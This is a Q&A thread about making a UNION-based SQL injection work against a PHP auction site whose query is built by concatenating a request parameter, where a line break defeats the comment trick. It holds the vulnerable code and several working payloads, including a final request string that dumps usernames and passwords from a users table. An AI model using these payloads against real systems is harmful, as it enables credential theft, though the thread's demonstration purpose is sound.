# SQL Injection demonstration failing - comment character fails due to line break

Tags: php, mysql, sql, sql-injection

Good evening,
A buddy of mine had a site developed from some second-rate developers, and now I'm tasked with cleaning up their work.  I'm trying to demonstrate to him some of the problems they created.  In his code, there is this exact block:

```
$id = $_REQUEST['id'];
//echo time();
$query = "SELECT cat_id,id,category,title,description,pict_url,minimum_bid,ends,cat_name,quantity,flag
              FROM " . $DBPrefix . "categories INNER JOIN ". $DBPrefix . "auctions 
              ON vesp_categories.cat_id=vesp_auctions.category where id=".$id." 
                          AND starts <= ".time()." AND suspended = 0";
```

(I know, right?)

Multiple queries are out of the question - mysql_query is being used and not instructed to use multiple queries.  I could do a union:

```
?id=143 AND 1=0 union select null,null,null,nick,password,null,null,null,null,null,null from bidz_users limit 1,1-- -
```

But the fact that 'AND starts <= ".time()." AND suspended = 0"' is on a new line, breaks the effect of the comment character, and just returns a mysql error of "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND starts <= 1365321338 AND suspended = 0' at line 4"

If I remove the line-break in the query, it works great, but an attacker with enough access to edit his PHP likely wouldn't bother with SQL injection

Is there a way around the new-line/comment-out problem with my constraints? Or could someone suggest a suitable alternative?

PHP >= 5.2 / MySQL

Answer (score 3, accepted):

You need to make sure your injection still creates a valid statement. So you could use another UNION SELECT to fix up the remaining statement parts:

```
143 AND 1=0 union select null,null,null,nick,password,null,null,null,null,null,null from bidz_users limit 1,1 union select * from (select null start,null suspended,null,null,null,null,null,null,null,null,null) t where 1=0
```

Note to specify matching column names in the sub-query so that the ones in the parent `WHERE` clause are found.

If you don’t need the `LIMIT` clause, you could do the same fix up in your first injected `SELECT`.

Comment: It doesn't look like this works either, but for a different reason.  When run, I get  'Duplicate column name 'NULL''

It seems to be related to this:
http://bugs.mysql.com/bug.php?id=54493

I have tried all manner of subquery I could think of, but I still get that error.

Comment: @NeilT Have you tried giving each column a distinct name? Or simply other values than `null`?

Comment: Silly me.  Fixed it, and now it's working.  This is the exact request string I ended up using: ?id=9 AND 1=0 union select null,null,null,CONCAT('USERNAME: ',nick,' PASSWORD: ',password),null,null,null,null,null,null,null from vesp_users limit 0,1 union select * from (select null starts, 'one' suspended,'two','three','four','five','six','seven','eight','nine','ten') t where 1=0